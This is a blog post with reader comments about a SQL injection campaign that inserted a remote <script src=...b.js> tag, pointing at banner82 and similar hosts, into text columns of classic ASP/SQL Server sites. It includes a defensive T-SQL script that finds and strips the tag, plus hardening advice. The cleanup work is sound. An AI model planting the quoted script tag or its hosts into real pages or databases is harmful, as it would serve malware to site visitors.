Recent SQL Injection Attacks on ASP sites

There seem to be a number of SQL injection attacks happening lately that append <script src=http://www.banner82.org/b.js></script> (or adword71.com/b.js and the like) to values stored in string/text/varchar columns of the database, targeting classic ASP (3.0) sites backed by SQL Server. Note that the attackers need not know your table or column names to do this.

I definitely do not wish to play cops and robbers here, but I do want to contribute a little. There are a number of articles on this attack (read on), and even more on preventing SQL injection and related exploits such as cross-site scripting, so help yourself.

As mentioned, this is mostly aimed at classic ASP (3.0) sites, but I am posting it here nevertheless.

Read the full article: Security alert: SQL injection attacks - banner82 script

Thanks to Robert Robbins' post on rising SQL injection threats for making me think of cross-posting here on weblogs.asp.net. I agree that this threat could be countered better with help and information from the community (if not from MSFT itself).

4 Comments

  • To avoid the infection, you have to remove the sysobjects & syscolumns rights from the database user in the GLOBAL.ASA, so the script can no longer access the sys tables to list the database tables and columns and infect them precisely; the script just won't execute!

    Then you'll have to remove every reference to the script inside the cells, but without using REPLACE, because ntext, text or image fields could have been altered.

    I recommend using a script (ASP or PHP) to access the infected databases, table after table, column after column, to find any script like '%banner82.com%', '%adw95.com%', '%/b.js%', etc. (there are many variants depending on the website or the name of the script: 'b.js', 'g.js', '1.js', ...).
    It would be even better to use regex inside SQL Server queries, but you have to use a UDF to do so (you can find some by searching for 'SQL Server 2000 regex').
    Once you have found all occurrences, you can UPDATE each field with a cleaning script.

    Then you're done!
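The procedure the first comment above describes (walk the database table by table and column by column, find the injected tag, then UPDATE the affected fields) can be done entirely in T-SQL, which also makes the body's point concrete: the same system catalog that lets an attacker hit every text column without knowing your schema lets you find the damage the same way. The following is an added example, not code from the original post or from any of its commenters. It assumes SQL Server 2005 or later (the (n)varchar(max) casts are what sidestep the REPLACE-on-text/ntext problem the comment warns about), and the @Tag and @Pattern values are illustrative, built from the examples quoted on this page.

```sql
-- Added example, not code from the original post or its comments.
-- Walks every character column of every base table in the current database,
-- reports rows that contain an injected <script src=...></script> tag, and
-- (only when @DryRun = 0) strips the exact tag given in @Tag.
-- Assumptions: SQL Server 2005 or later; @Tag and @Pattern are illustrative
-- values taken from the examples on this page. Take a full backup before
-- running with @DryRun = 0.
SET NOCOUNT ON;

DECLARE @DryRun  bit;            -- 1 = report only, 0 = also clean
DECLARE @Tag     nvarchar(400);  -- exact injected tag to remove
DECLARE @Pattern nvarchar(100);  -- LIKE pattern used to locate infected rows
SET @DryRun  = 1;
SET @Tag     = N'<script src=http://www.banner82.org/b.js></script>';
SET @Pattern = N'%<script src=%';  -- deliberately wide: catches b.js, g.js, 1.js variants

DECLARE @Schema sysname, @Table sysname, @Column sysname, @Type sysname;
DECLARE @Cast nvarchar(20), @Sql nvarchar(max), @Hits int, @Changed int, @Total int;
SET @Total = 0;

-- All text-capable columns of base tables (views are skipped). These are the
-- same column types the mass-injection scripts target: varchar, nvarchar,
-- text and ntext, plus their fixed-width cousins.
DECLARE cols CURSOR LOCAL FAST_FORWARD FOR
    SELECT c.TABLE_SCHEMA, c.TABLE_NAME, c.COLUMN_NAME, c.DATA_TYPE
    FROM INFORMATION_SCHEMA.COLUMNS AS c
    JOIN INFORMATION_SCHEMA.TABLES  AS t
      ON t.TABLE_SCHEMA = c.TABLE_SCHEMA AND t.TABLE_NAME = c.TABLE_NAME
    WHERE t.TABLE_TYPE = 'BASE TABLE'
      AND c.DATA_TYPE IN ('char', 'varchar', 'text', 'nchar', 'nvarchar', 'ntext');

OPEN cols;
FETCH NEXT FROM cols INTO @Schema, @Table, @Column, @Type;
WHILE @@FETCH_STATUS = 0
BEGIN
    -- Cast legacy text/ntext to a MAX type so REPLACE can operate on them;
    -- keep Unicode columns Unicode.
    SET @Cast = CASE WHEN @Type IN ('nchar', 'nvarchar', 'ntext')
                     THEN N'nvarchar(max)' ELSE N'varchar(max)' END;

    -- Count infected rows in this column. Object names go through QUOTENAME;
    -- the search pattern is passed as a parameter, never concatenated in.
    SET @Sql = N'SELECT @n = COUNT(*) FROM ' + QUOTENAME(@Schema) + N'.' + QUOTENAME(@Table)
             + N' WHERE CAST(' + QUOTENAME(@Column) + N' AS ' + @Cast + N') LIKE @p';
    EXEC sp_executesql @Sql, N'@p nvarchar(100), @n int OUTPUT', @p = @Pattern, @n = @Hits OUTPUT;

    IF @Hits > 0
    BEGIN
        SET @Total = @Total + @Hits;
        PRINT QUOTENAME(@Schema) + N'.' + QUOTENAME(@Table) + N'.' + QUOTENAME(@Column)
            + N' (' + @Type + N'): ' + CAST(@Hits AS nvarchar(12)) + N' infected row(s)';

        IF @DryRun = 0
        BEGIN
            -- Strip the tag and write the value back. The outer CAST keeps the
            -- assignment type-compatible with text/ntext columns. The row count
            -- is captured inside the dynamic batch so it is reliable.
            SET @Sql = N'UPDATE ' + QUOTENAME(@Schema) + N'.' + QUOTENAME(@Table)
                     + N' SET ' + QUOTENAME(@Column) + N' = CAST(REPLACE(CAST('
                     + QUOTENAME(@Column) + N' AS ' + @Cast + N'), @t, N'''') AS ' + @Cast + N')'
                     + N' WHERE CAST(' + QUOTENAME(@Column) + N' AS ' + @Cast + N') LIKE @p;'
                     + N' SET @n = @@ROWCOUNT;';
            EXEC sp_executesql @Sql, N'@t nvarchar(400), @p nvarchar(100), @n int OUTPUT',
                 @t = @Tag, @p = @Pattern, @n = @Changed OUTPUT;
            PRINT N'  rewrote ' + CAST(@Changed AS nvarchar(12)) + N' row(s)';
        END
    END

    FETCH NEXT FROM cols INTO @Schema, @Table, @Column, @Type;
END
CLOSE cols;
DEALLOCATE cols;

PRINT N'Total infected rows found: ' + CAST(@Total AS nvarchar(12));
```

Run it first with @DryRun = 1, read the report to learn which exact tags were injected (the attacks on this page used several hostnames and script names), then run once per distinct tag with @DryRun = 0. Cleaning the data only buys time if the ASP pages still concatenate user input into SQL strings: the site will be reinfected, as the second comment below reports. Parameterize the queries and cut the database user's rights, as the first comment suggests, before or alongside the cleanup.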

  • Thanks so much for posting this script.

    I look after a micro business client who has a dynamic website running on an ASP database which has been repeatedly attacked.

    I have been hassling him for months to do something. He finally commissioned a new site running secure PHP/MySQL (hopefully!).

    Meanwhile, I have been left with trying to keep the existing site limping along for 6 weeks until the new system is ready.

    The script worked a treat.

    Again Many thanks

  • Yes, this is the latest threat in SQL injection, but the older classic exploits at the top of the page are more suitable for newcomers who don't have much understanding of the latest SQL injections. So try to have a look at the latest security exploits too.

  • Hi there, just wanted to give you a quick heads up. The text in your content seems to be running off the screen in IE. I'm not sure if this is a formatting issue or something to do with browser compatibility, but I figured I'd post to let you know.

    The layout looks great though! Hope you get the problem solved soon. Thanks
